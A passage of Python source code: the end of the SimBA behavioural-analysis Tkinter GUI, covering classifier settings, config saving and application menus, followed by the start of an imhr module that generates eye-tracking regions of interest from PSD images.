self.generate_features_imp_log = 'yes'
else:
self.generate_features_imp_log = 'no'
if self.box6.get() == 1:
self.generate_features_bar_graph = 'yes'
else:
self.generate_features_bar_graph = 'no'
self.n_importance = self.label_n_feature_importance_bars.entry_get
if self.box7.get() == 1:
self.compute_permutation_imp = 'yes'
else:
self.compute_permutation_imp = 'no'
if self.box8.get() == 1:
self.generate_learning_c = 'yes'
else:
self.generate_learning_c = 'no'
self.learningcurveksplit = self.LC_ksplit.entry_get
self.learningcurvedatasplit = self.LC_datasplit.entry_get
if self.box9.get() == 1:
self.generate_precision_recall_c = 'yes'
else:
self.generate_precision_recall_c = 'no'
if self.box10.get() == 1:
self.getshapscores = 'yes'
else:
self.getshapscores = 'no'
self.shappresent = self.shap_present.entry_get
self.shapabsent = self.shap_absent.entry_get
def save_new(self):
self.get_checkbox()
meta_number = 0
for f in os.listdir(os.path.join(os.path.dirname(self.configini), 'configs')):
if f.__contains__('_meta') and f.__contains__(str(self.varmodel.get())):
meta_number += 1
# for s in self.settings:
# meta_df[s.lblName.cget('text')] = [s.entry_get]
new_meta_dict = {'RF_n_estimators': self.label_nestimators.entry_get,
'RF_max_features': self.label_maxfeatures.entry_get, 'RF_criterion': self.label_criterion.entry_get,
'train_test_size': self.label_testsize.entry_get, 'RF_min_sample_leaf': self.label_minsampleleaf.entry_get,
'under_sample_ratio': self.label_under_s_correctionvalue.entry_get, 'under_sample_setting': self.label_under_s_settings.entry_get,
'over_sample_ratio': self.label_over_s_ratio.entry_get, 'over_sample_setting': self.label_over_s_settings.entry_get,
'generate_rf_model_meta_data_file': self.rfmetadata,
'generate_example_decision_tree': self.generate_example_d_tree,'generate_classification_report':self.generate_classification_report,
'generate_features_importance_log': self.generate_features_imp_log,'generate_features_importance_bar_graph':self.generate_features_bar_graph,
'n_feature_importance_bars': self.n_importance,'compute_feature_permutation_importance':self.compute_permutation_imp,
'generate_sklearn_learning_curves': self.generate_learning_c,
'generate_precision_recall_curves':self.generate_precision_recall_c, 'learning_curve_k_splits':self.learningcurveksplit,
'learning_curve_data_splits': self.learningcurvedatasplit,
'generate_shap_scores':self.getshapscores,
'shap_target_present_no':self.shappresent,
'shap_target_absetn_no':self.shapabsent}
meta_df = pd.DataFrame(new_meta_dict, index=[0])
meta_df.insert(0, 'Classifier_name', str(self.varmodel.get()))
if currentPlatform == 'Windows':
output_path = os.path.dirname(self.configini) + "\\configs\\" + \
str(self.varmodel.get())+ '_meta_' + str(meta_number) + '.csv'
if currentPlatform == 'Linux'or (currentPlatform == 'Darwin'):
output_path = os.path.dirname(self.configini) + "/configs/" + \
str(self.varmodel.get())+ '_meta_' + str(meta_number) + '.csv'
print(os.path.basename(str(output_path)),'saved')
meta_df.to_csv(output_path, index=FALSE)
def set_values(self):
self.get_checkbox()
#### settings
model = self.var.get()
n_estimators = self.label_nestimators.entry_get
max_features = self.label_maxfeatures.entry_get
criterion = self.label_criterion.entry_get
test_size = self.label_testsize.entry_get
min_sample_leaf = self.label_minsampleleaf.entry_get
under_s_c_v = self.label_under_s_correctionvalue.entry_get
under_s_settings = self.label_under_s_settings.entry_get
over_s_ratio = self.label_over_s_ratio.entry_get
over_s_settings = self.label_over_s_settings.entry_get
classifier_settings = self.varmodel.get()
#export settings to config ini file
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('create ensemble settings', 'model_to_run', str(model))
config.set('create ensemble settings', 'RF_n_estimators', str(n_estimators))
config.set('create ensemble settings', 'RF_max_features', str(max_features))
config.set('create ensemble settings', 'RF_criterion', str(criterion))
config.set('create ensemble settings', 'train_test_size', str(test_size))
config.set('create ensemble settings', 'RF_min_sample_leaf', str(min_sample_leaf))
config.set('create ensemble settings', 'under_sample_ratio', str(under_s_c_v))
config.set('create ensemble settings', 'under_sample_setting', str(under_s_settings))
config.set('create ensemble settings', 'over_sample_ratio', str(over_s_ratio))
config.set('create ensemble settings', 'over_sample_setting', str(over_s_settings))
config.set('create ensemble settings', 'classifier',str(classifier_settings))
config.set('create ensemble settings', 'RF_meta_data', str(self.rfmetadata))
config.set('create ensemble settings', 'generate_example_decision_tree', str(self.generate_example_d_tree))
config.set('create ensemble settings', 'generate_classification_report', str(self.generate_classification_report))
config.set('create ensemble settings', 'generate_features_importance_log', str(self.generate_features_imp_log))
config.set('create ensemble settings', 'generate_features_importance_bar_graph', str(self.generate_features_bar_graph))
config.set('create ensemble settings', 'N_feature_importance_bars', str(self.n_importance))
config.set('create ensemble settings', 'compute_permutation_importance', str(self.compute_permutation_imp))
config.set('create ensemble settings', 'generate_learning_curve', str(self.generate_learning_c))
config.set('create ensemble settings', 'generate_precision_recall_curve', str(self.generate_precision_recall_c))
config.set('create ensemble settings', 'LearningCurve_shuffle_k_splits',str(self.learningcurveksplit))
config.set('create ensemble settings', 'LearningCurve_shuffle_data_splits',str(self.learningcurvedatasplit))
config.set('create ensemble settings', 'generate_example_decision_tree_fancy',str(self.generate_example_decision_tree_fancy))
config.set('create ensemble settings', 'generate_shap_scores',str(self.getshapscores))
config.set('create ensemble settings', 'shap_target_present_no', str(self.shappresent))
config.set('create ensemble settings', 'shap_target_absent_no', str(self.shapabsent))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Settings exported to project_config.ini')
class makelineplot:
def __init__(self):
# Popup window
lpToplevel = Toplevel()
lpToplevel.minsize(200, 200)
lpToplevel.wm_title("Make line plot")
lpLabelframe = LabelFrame(lpToplevel)
lpvideo = FileSelect(lpLabelframe,'Video',lblwidth='10')
lpcsv = FileSelect(lpLabelframe,'csv file',lblwidth='10')
bpentry = Entry_Box(lpLabelframe,'Bodypart','10')
lpbutton = Button(lpLabelframe,text='Generate plot',command =lambda: draw_line_plot_tools(lpvideo.file_path,lpcsv.file_path,bpentry.entry_get))
#organize
lpLabelframe.grid(row=0,sticky=W)
lpvideo.grid(row=0,sticky=W)
lpcsv.grid(row=1,sticky=W)
bpentry.grid(row=2,sticky=W)
lpbutton.grid(row=3,pady=10)
class runmachinemodelsettings:
def __init__(self,inifile):
self.row1 = []
self.row2 = []
self.row3 = []
self.row4 = []
self.targetname = []
# Popup window
runmms = Toplevel()
runmms.minsize(200, 200)
runmms.wm_title("Select model to run")
### read inifile and get the model
config = ConfigParser()
configini = str(inifile)
config.read(configini)
no_targets = config.get('SML settings','no_targets')
###get all target from ini
for i in range(int(no_targets)):
currentModelNames = 'target_name_' + str(i+1)
currentModelNames = config.get('SML settings', currentModelNames)
self.targetname.append(currentModelNames)
###loop for table
table = LabelFrame(runmms)
#set title
tn = Label(table,text='Classifier',font=("Helvetica",10,'bold'))
tn.grid(row=0,column=0,sticky=W,pady=5)
selectmodel = Label(table,text='Model path (.sav)',font=("Helvetica",10,'bold'))
selectmodel.grid(row=0,column=1)
thresholdtitle = Label(table,text='Threshold',font=("Helvetica",10,'bold') )
thresholdtitle.grid(row=0,column=2,sticky=W)
minbouttitle = Label(table,text='Minimum Bout',font=("Helvetica",10,'bold'))
minbouttitle.grid(row=0,column=3,sticky=W)
# main loop for content of table
for i in range(len(self.targetname)):
self.row1.append(Label(table,text=str(self.targetname[i])))
self.row1[i].grid(row=i+2,column=0,sticky=W)
self.row2.append(FileSelect(table,title='Select model (.sav) file'))
self.row2[i].grid(row=i+2,column=1,sticky=W)
self.row3.append(Entry(table))
self.row3[i].grid(row=i+2,column=2,sticky=W,padx=5)
self.row4.append(Entry(table))
self.row4[i].grid(row=i+2,column=3,sticky=W,padx=5)
button_set = Button(runmms,text='Set model(s)',command =lambda:self.set_modelpath_to_ini(inifile),font=("Helvetica",10,'bold'),fg='red')
table.grid(row=0,sticky=W,pady=5,padx=5)
button_set.grid(row=1,pady=10)
def set_modelpath_to_ini(self,inifile):
config = ConfigParser()
configini = str(inifile)
config.read(configini)
for i in range(len(self.targetname)):
config.set('SML settings','model_path_'+(str(i+1)),str(self.row2[i].file_path))
config.set('threshold_settings', 'threshold_' + (str(i + 1)), str(self.row3[i].get()))
config.set('Minimum_bout_lengths', 'min_bout_' + (str(i + 1)), str(self.row4[i].get()))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Model paths saved in project_config.ini')
def get_frame(self):
'''
Return the "frame" useful to place inner controls.
'''
return self.canvas
class ToolTip(object):
def __init__(self, widget):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, cx, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 57
y = y + cy + self.widget.winfo_rooty() +27
self.tipwindow = tw = Toplevel(self.widget)
tw.wm_overrideredirect(1)
tw.wm_geometry("+%d+%d" % (x, y))
label = Label(tw, text=self.text, justify=LEFT,
background="#ffffe0", relief=SOLID, borderwidth=1,
font=("tahoma", "8", "normal"))
label.pack(ipadx=1)
def hidetip(self):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
def CreateToolTip(widget, text):
toolTip = ToolTip(widget)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind('<Enter>', enter)
widget.bind('<Leave>', leave)
def form_validator_is_numeric(inStr, acttyp):
if acttyp == '1': #insert
if not inStr.isdigit():
return False
return True
class aboutgui:
def __init__(self):
about = Toplevel()
about.minsize(657, 398)
about.wm_title("About")
canvas = Canvas(about,width=657,height=398,bg='black')
canvas.pack()
scriptdir = os.path.dirname(__file__)
img = PhotoImage(file=os.path.join(scriptdir,'TheGoldenLab_aboutme.png'))
canvas.create_image(0,0,image=img,anchor='nw')
canvas.image = img
class App(object):
def __init__(self):
scriptdir = os.path.dirname(os.path.realpath(__file__))
self.root = Tk()
self.root.title('SimBA')
self.root.minsize(750,750)
self.root.geometry("750x750")
self.root.rowconfigure(0, weight=1)
self.root.columnconfigure(0, weight=1)
if currentPlatform == 'Windows':
self.root.iconbitmap(os.path.join(scriptdir,'SimBA_logo.ico'))
img = PhotoImage(file=os.path.join(scriptdir,'golden.png'))
background = Label(self.root, image=img, bd=0)
background.pack(fill='both', expand=True)
background.image = img
### drop down menu###f
menu = Menu(self.root)
self.root.config(menu=menu)
#first menu
fileMenu = Menu(menu)
menu.add_cascade(label='File', menu=fileMenu)
fileMenu.add_command(label='Create a new project',command=project_config)
fileMenu.add_command(label='Load project', command=lambda:loadprojectMenu(loadprojectini))
fileMenu.add_separator()
fileMenu.add_command(label='Exit', command=Exit)
# Process video
pvMenu = Menu(menu)
menu.add_cascade(label='Process Videos', menu=pvMenu)
pvMenu.add_command(label='Batch pre-process videos', command=batch_processvideo)
#third menu
thirdMenu = Menu(menu)
menu.add_cascade(label='Tracking',menu=thirdMenu)
#dlc
dlcmenu = Menu(thirdMenu)
dlcmenu.add_command(label='Create DLC Model',command=create_project_DLC)
dlcmenu.add_command(label='Load DLC Model',command=Load_DLC_Model)
#deepPoseKit
dpkmenu = Menu(thirdMenu)
dpkmenu.add_command(label='Create DeepPoseKit project', command=createDPK_project)
dpkmenu.add_command(label='Load DeepPoseKit project', command=lambda:loadprojectMenu(deepPoseKitMenu))
#labelling tool
labellingtoolmenu = Menu(thirdMenu)
labellingtoolmenu.add_command(label='labelImg', command=lambda: subprocess.call(["labelImg"]))
labellingtoolmenu.add_command(label='labelme', command=lambda: subprocess.call(["labelme"]))
#third menu organize
thirdMenu.add_cascade(label='DeepLabCut', menu=dlcmenu)
thirdMenu.add_cascade(label='DeepPoseKit', menu=dpkmenu)
thirdMenu.add_command(label='LEAP', command=lambda: print('coming soon'))
thirdMenu.add_cascade(label='Labelling tools', menu=labellingtoolmenu)
#fifth menu
fifthMenu = Menu(menu)
#changefpsmenu
fpsMenu = Menu(fifthMenu)
fpsMenu.add_command(label='Change fps for single video', command=changefps)
fpsMenu.add_command(label='Change fps for multiple videos',command=changefpsmulti)
menu.add_cascade(label='Tools',menu=fifthMenu)
fifthMenu.add_command(label='Clip videos',command=shorten_video)
fifthMenu.add_command(label='Clip video into multiple videos', command=multi_shorten_video)
fifthMenu.add_command(label='Crop videos',command=crop_video)
fifthMenu.add_command(label='Multi-crop',command=multicropmenu)
fifthMenu.add_command(label='Downsample videos',command=video_downsample)
fifthMenu.add_command(label='Get mm/ppx',command = get_coordinates_from_video)
fifthMenu.add_command(label='Make line plot', command=makelineplot)
fifthMenu.add_cascade(label='Change fps...',menu =fpsMenu)
#changefpsmenu organize
changeformatMenu = Menu(fifthMenu)
changeformatMenu.add_command(label='Change image file formats',command=change_imageformat)
changeformatMenu.add_command(label='Change video file formats',command=convert_video)
changeformatMenu.add_command(label='Change .seq to .mp4', command=lambda:convertseqVideo(askdirectory(title='Please select video folder to convert')))
fifthMenu.add_cascade(label='Change formats...',menu=changeformatMenu)
fifthMenu.add_command(label='CLAHE enhance video',command=Red_light_Convertion)
fifthMenu.add_command(label='Superimpose frame numbers on video',command=lambda:superimposeframe(askopenfilename()))
fifthMenu.add_command(label='Convert to grayscale',command=lambda:greyscale(askopenfilename()))
fifthMenu.add_command(label='Merge frames to video',command=mergeframeffmpeg)
fifthMenu.add_command(label='Generate gifs', command=creategif)
extractframesMenu = Menu(fifthMenu)
extractframesMenu.add_command(label='Extract defined frames',command=extract_specificframes)
extractframesMenu.add_command(label='Extract frames',command=extract_allframes)
extractframesMenu.add_command(label='Extract frames from seq files', command=extract_seqframe)
fifthMenu.add_cascade(label='Extract frames...',menu=extractframesMenu)
convertWftypeMenu = Menu(fifthMenu)
convertWftypeMenu.add_command(label='Convert CSV to parquet', command=CSV2parquet)
convertWftypeMenu.add_command(label='Convert parquet o CSV', command=parquet2CSV)
fifthMenu.add_cascade(label='Convert working file type...', menu=convertWftypeMenu)
#sixth menu
sixthMenu = Menu(menu)
menu.add_cascade(label='Help',menu=sixthMenu)
#labelling tool
links = Menu(sixthMenu)
links.add_command(label='Download weights',command = lambda:webbrowser.open_new(str(r'https://osf.io/sr3ck/')))
links.add_command(label='Download classifiers', command=lambda: webbrowser.open_new(str(r'https://osf.io/kwge8/')))
links.add_command(label='Ex. feature list',command=lambda: webbrowser.open_new(str(r'https://github.com/sgoldenlab/simba/blob/master/misc/Feature_description.csv')))
links.add_command(label='SimBA github', command=lambda: webbrowser.open_new(str(r'https://github.com/sgoldenlab/simba')))
links.add_command(label='Gitter Chatroom', command=lambda: webbrowser.open_new(str(r'https://gitter.im/SimBA-Resource/community')))
links.add_command(label='Install FFmpeg',command =lambda: webbrowser.open_new(str(r'https://m.wikihow.com/Install-FFmpeg-on-Windows')))
links.add_command(label='Install graphviz', command=lambda: webbrowser.open_new(str(r'https://bobswift.atlassian.net/wiki/spaces/GVIZ/pages/20971549/How+to+install+Graphviz+software')))
sixthMenu.add_cascade(label="Links",menu=links)
sixthMenu.add_command(label='About', command= aboutgui)
#Status bar at the bottom
self.frame = Frame(background, bd=2, relief=SUNKEN, width=300, height=300)
self.frame.pack(expand=True)
self.txt = Text(self.frame, bg='white')
self.txt.config(state=DISABLED)
self.txt.pack(expand=True, fill='both')
sys.stdout = StdRedirector(self.txt)
# writes text out in GUI
class StdRedirector(object):
def __init__(self, text_widget):
self.text_space = text_widget
def write(self, string):
self.text_space.config(state=NORMAL)
self.text_space.insert("end", string)
self.text_space.update()
self.text_space.see("end")
self.text_space.config(state=DISABLED)
class SplashScreen:
def __init__(self, parent):
self.parent = parent
self.Splash()
self.Window()
def Splash(self):
scriptdir = os.path.dirname(__file__)
if currentPlatform == 'Windows':
self.image = Image.open(os.path.join(scriptdir,"TheGoldenLab.png"))
if (currentPlatform == 'Linux') or (currentPlatform == 'Darwin'):
self.image = Image.open(os.path.join(scriptdir, "TheGoldenLab.PNG"))
self.imgSplash = ImageTk.PhotoImage(self.image)
def Window(self):
width, height = self.image.size
halfwidth = (self.parent.winfo_screenwidth()-width)//2
halfheight = (self.parent.winfo_screenheight()-height)//2
self.parent.geometry("%ix%i+%i+%i" %(width, height, halfwidth,halfheight))
Label(self.parent, image=self.imgSplash).pack()
def terminate_children(children):
for process in children:
process.terminate()
def main():
#windows icon
if currentPlatform == 'Windows':
import ctypes
myappid = 'SimBA development wheel' # arbitrary string
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
root = Tk()
root.overrideredirect(True)
# import tkinter.font as TkFont
# default_font = TkFont.nametofont("TkDefaultFont")
# default_font.configure(size=6)
# root.option_add("*Font", default_font)
app = SplashScreen(root)
root.after(2000, root.destroy)
root.mainloop()
app = App()
print('Welcome fellow scientists :)' + '\n')
print('\n')
app.root.mainloop()
|
_roi.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
| `@purpose`: Generate regions of interest that can be used for data processing and analysis.
| `@date`: Created on Sat May 1 15:12:38 2019
| `@author`: Semeon Risom
| `@email`: semeon.risom@gmail.com
| `@url`: https://semeon.io/d/imhr
"""
# allowed imports
__all__ = ['ROI']
# required external libraries
__required__ = ['opencv-python','psd-tools','matplotlib','Pillow']
# local
from .. import settings
# check if psd_tools and cv2 is available
try:
# required for init
from pdb import set_trace as breakpoint
import os
from pathlib import Path
import pandas as pd
import numpy as np
import random
# plot
from PIL import Image, ImageOps
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as patches
# import photoshop
import psd_tools
# math
import cv2
except ImportError as e:
pkg = e.name
x = {'cv2':'opencv-python', 'psd_tools':'psd-tools'}
pkg = x[pkg] if pkg in x else pkg
raise Exception("No module named '%s'. Please install from PyPI before continuing."%(pkg),'red')
class ROI():
"""Generate regions of interest that can be used for data processing and analysis."""
@classmethod
def __init__(self, isMultiprocessing=False, detection='manual', image_path=None, output_path=None, metadata_source=None,
roi_format='both', shape='box', roicolumn='roi', uuid=None, filetype='psd', **kwargs):
"""Generate regions of interest that can be used for data processing and analysis.
Parameters
----------
isMultiprocessing : :obj:`bool`
Should the rois be generated using multiprocessing. Default is **False**.
detection : :obj:`str` {'manual', 'haarcascade'}
How should the regions of interest be detected. Either manually (**manual**), through the use of highlighting layers in photo-editing
software, or automatically through feature detection using **haarcascade** classifers from opencv. Default **manual**.
image_path : :obj:`str`
Image directory path.
output_path : :class:`str`
Path to save data.
roi_format : :obj:`str` {'raw', 'dataviewer', 'both'}
Format to export ROIs. Either to 'csv' (**raw**) or to Eyelink DataViewer 'ias' (**dataviewer**) or both (**both**).
Default is **both**. Note: If **roi_format** = **dataviewer**, **shape** must be either be **circle**, **rotated**, or **straight**.
metadata_source : :class:`str` or :obj:`None` {'path', 'embedded'}
Metadata source. If metadata is being read from a spreadsheet, **metadata_source** should be equal to path the to
the metadata file, else if metadata is embed within the image as a layer name, **metadata_source** = **embedded**.
Default is **embedded**. For example:
>>> # if metadata is in PSD images
>>> metadata = 'embedded'
>>> # if metadata is an external xlsx file.
>>> metadata = 'roi/metadata.xlsx'
Although Photoshop PSD don't directly provide support for metadata. However if each region of interest is stored
as a seperate layer within a PSD, the layer name can be used to store metadata. To do this, the layer name has
to be written as delimited text. Our code can read this data and extract relevant metadata. The delimiter can
be either **;** **,** **|** **\\t** or **\\s** (Delimiter type must be identified when running this code using the
**delimiter** parameter. The default is **;**.). Here's an example using **;** as a delimiter:
.. rst-class:: code-param-whitespace
>>> imagename = "BM001"; roiname = 1; feature = "lefteye"
Note: whitespace should be avoided from from each layer name. Whitespaces may cause errors during parsing.
shape : :obj:`str` {'polygon', 'hull', 'circle', 'rotated', 'straight'}
Shape of machine readable boundaries for region of interest. Default is **straight**. **polygon** creates a Contour
Approximation and will most closely match the orginal shape of the roi. **hull** creates a Convex Hull, which
is similar to but not as complex as a Contour Approximation and will include bulges for areas that are convex.
**circle** creates a mininum enclosing circle. Finally, both **rotated** and **straight** create a Bounding Rectangle,
with the only difference being compensation for the mininum enclosing area for the box when using **rotated**.
roicolumn : :obj:`str`
The name of the label for the region of interest in your metadata. For example you may want to extract the column
'feature' from your metadata and use this as the label. Default is **roi**.
uuid : :obj:`list` or :obj:`None`
Create a unique id by combining a list of existing variables in the metadata. This is recommended
if **roi_format** == **dataviewer** because of the limited variables allowed for ias files. Default is **None**.
filetype: :obj:`str` {'psd', 'tiff', 'dcm', 'png', 'bmp', 'jpg'}
The filetype extension of the image file. Case insensitive. Default is **psd**. If **psd**, **tiff** or **DICOM**
the file can be read as multilayered.
**kwargs : :obj:`str` or :obj:`None`, optional
Additional properties to control how data is exported, naming variables, exporting images are also available:
These properties control additional core parameters for the API:
.. list-table::
:class: kwargs
:widths: 25 50
:header-rows: 1
* - Property
- Description
* - **cores** : :obj:`bool`
- (if **isMultiprocessing** == **True**) Number of cores to use. Default is total available cores - 1.
* - **isLibrary** : :obj:`bool`
- Check if required packages have been installed. Default is **False**.
* - **isDebug** : :obj:`bool`
- Allow flags to be visible. Default is **False**.
* - **isDemo** : :obj:`bool`
- Tests code with in-house images and metadata. Default is **False**.
* - **save_data** : :obj:`bool`
- Save coordinates. Default is **True**.
* - **newcolumn** : :obj:`dict` {:obj:`str`, :obj:`str`} or :obj:`False`
- Add additional column to metadata. This must be in the form of a dict in this form {key: value}. Default is **False**.
* - **save_raw_image** : :obj:`bool`
- Save images. Default is True.
* - **append_output_name** : :obj:`bool` or :obj:`str`
- Add appending name to all exported files (i.e. <'top_center'> IMG001_top_center.ias). Default is **False**.
* - **save_contour_image** : :obj:`bool`
- Save generated contours as images. Default is **True**.
* - **scale** : :obj:`int`
- If image is scaled during presentation, set scale. Default is **1**.
* - **offset** : :obj:`list` [:obj:`int`]
- Center point of image, relative to screensize. Default is **[960, 540]**.
* - **screensize** : :obj:`list` [:obj:`int`]
- Monitor size is being presented. Default is **[1920, 1080]**.
These properties control data is processed which include the type of haarcascade used, delimiters for metadata:
.. list-table::
:class: kwargs
:widths: 25 50
:header-rows: 1
* - Property
- Description
* - **delimiter** : :obj:`str` {';' , ',' , '|' , 'tab' , 'space'}
- (if **source** == **psd**) How is metadata delimited. Default is **;**.
* - **classifiers** : :obj:`default` or :obj:list of :obj:dict
- (if **detection** == **haarcascade**) Trained classifiers to use. Default is {'eye_tree_eyeglasses', 'eye', 'frontalface_alt_tree', 'frontalface_alt', 'frontalface_alt2','frontalface_default', 'fullbody', 'lowerbody', 'profileface', 'smile', 'upperbody'}. Parameters are stored `here <imhr.eyetracking.ROI.haar_parameters>`__. If you want to use custom classifiers, you can pass a list of classifiers and their arguments using the following format:
.. rst-class:: code-param-whitespace
.. code-block:: python
>>> [{'custom_cascade': {
... 'file': 'haarcascade_eye.xml',
... 'type': 'eye',
... 'path': './haarcascade_eye.xml',
... 'minN': 5,
... 'minS': (100,100),
... 'sF': 1.01 }
... }]
You can also pass custom arguments by calling them after initiation:
.. rst-class:: code-param-whitespace
.. code-block:: python
>>> roi = imhr.eyetracking.ROI(detection='manual.....)
>>> roi.default_classifiers['eye']['minNeighbors'] = 10
Here are properties specific to how images are exported after processing. The code can either use :class:`matplotlib` or :class:`PIL` as a backend engine:
.. list-table::
:class: kwargs
:widths: 25 50
:header-rows: 1
* - Property
- Description
* - **image_backend** : :class:`str` {'matplotlib', 'PIL'}
- Backend for exporting image. Either :class:`matplotlib` or :class:`PIL`. Default is :class:`matplotlib`.
* - **RcParams** : :class:`bool`
- A dictionary object including validation validating functions are defined and associated with rc parameters in class:`matplotlib.RcParams`. Default is **None**.
* - **background_color** : :class:`list`
- Set background color (RGB) for exporting images. Default is **[110, 110, 110]**.
* - **dpi** : :class:`int` or :obj:`None`
- (if **save_image** == **True**) Quality of exported images, refers to 'dots per inch'. Default is **300**.
* - **remove_axis** : :class:`bool`
- Remove axis from :obj:`matplotlib.pyplot`. Default is **False**.
* - **tight_layout** : :class:`bool`
- Remove whitespace from :obj:`matplotlib.pyplot`. Default is **False**.
* - **set_size_inches** : :class:`bool`
- Set size of :obj:`matplotlib.pyplot` according to screensize of ROI. Default is **False**.
Attributes
----------
shape_d : :class:`str` {'ELLIPSE', 'FREEHAND', 'RECTANGLE'}
DataViewer ROI shape.
psd : `psd_tools.PSDImage <https://psd-tools.readthedocs.io/en/latest/reference/psd_tools.html#psd_tools.PSDImage>`__
Photoshop PSD/PSB file object. The file should include one layer for each region of interest.
retval, threshold : :obj:`numpy.ndarray`
Returns from :ref:`cv2.threshold`. The function applies a fixed-level thresholding to a multiple-channel array.
**retval** provides an optimal threshold only if :ref:`cv2.THRESH_OTSU` is passed. **threshold** is an image after applying
a binary threshold (:ref:`cv2.THRESH_BINARY`) removing all greyscale pixels < 127. The output matches the same image
channel as the original image.
See `opencv <https://docs.opencv.org/4.0.1/d7/d1b/group__imgproc__misc.html#gae8a4a146d1ca78c626a53577199e9c57>`__ and
`leanopencv <https://www.learnopencv.com/opencv-threshold-python-cpp>`__ for more information.
contours, hierarchy : :obj:`numpy.ndarray`
Returns from :ref:`cv2.findContours`. This function returns contours from the provided binary image (threshold).
This is used here for later shape detection. **contours** are the detected contours, while hierarchy containing
information about the image topology.
See `opencv <https://docs.opencv.org/4.0.1/d3/dc0/group__imgproc__shape.html#gadf1ad6a0b82947fa1fe3c3d497f260e07>`__
for more information.
image_contours : :obj:`numpy.ndarray`
Returns from :ref:`cv2.drawContours`. This draws filled contours from the image.
Raises
------
Exception
[description]
Exception
[description]
Examples
--------
.. code-block:: python
>>> from imhr.roi import ROI
>>> s = "/dist/example/raw/"; d="/dist/example/"
>>> ROI(source=s, output_path=d, shape='box')
.. code-block:: python
>>> img.save('/Users/mdl-admin/Desktop/roi/PIL.png') #DEBUG: save PIL
>>> cv2.imwrite('/Users/mdl-admin/Desktop/roi/cv2.png', img_cv2) #DEBUG: save cv2
>>> plt.imshow(img_np); plt.savefig('/Users/mdl-admin/Desktop/roi/matplotlib.png') #DEBUG: save matplotlib
Notes
-----
Resources
* Guide
* https://docs.opencv.org/master/d4/d73/tutorial_py_contours_begin.html
* Details
* For more information about each shape:
* See https://docs.opencv.org/master/dd/d49/tutorial_py_contour_features.html
* For more information how images are drawn:
* See https://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html
* To understand how bounds are created:
* See https://docs.opencv.org/2.4/modules/imgproc/doc/structural_analysis_and_shape_descriptors.html
"""
import imhr
self.path = Path(imhr.__file__).parent
# get console and time
self.console = settings.console
self.now = settings.time
# check debug
self.isDebug = kwargs['isDebug'] if 'isDebug' in kwargs else False
# check library
self.isLibrary = kwargs['isLibrary'] if 'isLibrary' in kwargs else False
if self.isLibrary:
settings.library(__required__)
#----parameters
self.detection = detection
# demo
self.isDemo = kwargs['isDemo'] if 'isDemo' in kwargs else False
# multiprocessing
self.isMultiprocessing = isMultiprocessing
self.cores = kwargs['cores'] if 'cores' in kwargs else 'max'
# how to read data
self.metadata_source = kwargs['metadata_source'] if 'metadata_source' in kwargs else 'embed'
# how to format rois
self.roi_format = roi_format
# delimiter
self.delimiter = kwargs['delimiter'] if 'delimiter' in kwargs else ';'
# screensize
self.screensize = kwargs['screensize'] if 'screensize' in kwargs else [1920, 1080]
# scale
self.scale = kwargs['scale'] if 'scale' in kwargs else 1
# offset image coordinates
cx = self.screensize[0]/2
cy = self.screensize[1]/2
self.recenter = kwargs['recenter'] if 'recenter' in kwargs else [cx, cy]
if self.recenter is not [cx, cy]:
self.newoffset = True
else:
self.newoffset = False
# shape
self.shape = shape if shape in ['polygon', 'hull', 'circle', 'rotated', 'straight'] else 'straight'
self.shape_d = None #dataviewer shape
# uuid
self.uuid = uuid
# label
self.roicolumn = roicolumn
# add column
self.newcolumn = kwargs['newcolumn'] if 'newcolumn' in kwargs else None
# add appendix to name
self.append_output_name = kwargs['append_output_name'] if 'append_output_name' in kwargs else False
# save
self.save = {}
# save csv
self.save['data'] = kwargs['save_data'] if 'save_data' in kwargs else True
# save contour images
self.save['contours'] = kwargs['save_contour_image'] if 'save_contour_image' in kwargs else True
# save raw images
self.save['raw'] = kwargs['save_contour_image'] if 'save_contour_image' in kwargs else True
#-----PIL
self.background_color = kwargs['background_color'] if 'background_color' in kwargs else (110, 110, 110)
#-----matplotlib
self.image_backend = kwargs['image_backend'] if 'image_backend' in kwargs else 'matplotlib'
# hide/show
self.remove_axis = kwargs['remove_axis'] if 'remove_axis' in kwargs else False
self.tight_layout = kwargs['tight_layout'] if 'tight_layout' in kwargs else False
self.set_size_inches = kwargs['set_size_inches'] if 'set_size_inches' in kwargs else False
if self.remove_axis: plt.rcParams.update({'axes.titlesize':0, 'axes.labelsize':0, 'xtick.labelsize':0,
'ytick.labelsize':0, 'savefig.pad_inches':0, 'font.size': 0})
# sizes
self.dpi = kwargs['dpi'] if 'dpi' in kwargs else 300
self.axis_tick_fontsize = kwargs['axis_tick_fontsize'] if 'axis_tick_fontsize' in kwargs else 8
self.axis_title_fontsize = kwargs['axis_title_fontsize'] if 'axis_title_fontsize' in kwargs else 10
self.figure_title_fontsize = kwargs['figure_title_fontsize'] if 'figure_title_fontsize' in kwargs else 12
plt.rcParams.update({
#dpi
'figure.dpi': self.dpi,
#font
'ytick.labelsize': self.axis_tick_fontsize,
'xtick.labelsize': self.axis_tick_fontsize,
'axes.titlesize': self.axis_title_fontsize,
'figure.titlesize': self.figure_title_fontsize
})
self.rcParams = kwargs['rcParams'] if 'rcParams' in kwargs else matplotlib.rcParams
if self.rcParams is not None: plt.rcParams.update(self.rcParams)
#-----classifiers
import yaml
if ('classifiers' in kwargs) and (kwargs['classifiers'] is not 'default'):
self.classifiers = kwargs['classifiers']
else:
with open('%s/dist/roi/classifiers.yaml'%(self.path), 'r') as _file:
self.classifiers = yaml.safe_load(_file)
for item in self.classifiers:
self.classifiers[item]['path'] = '%s/%s'%(self.path, self.classifiers[item]['path'])
#-----colors
self.hex = ['#2179F1','#331AE5','#96E421','#C56D88','#61CAC5','#4980EC','#2E3400','#E0DB68','#C4EC5C','#D407D7','#FBB61B',
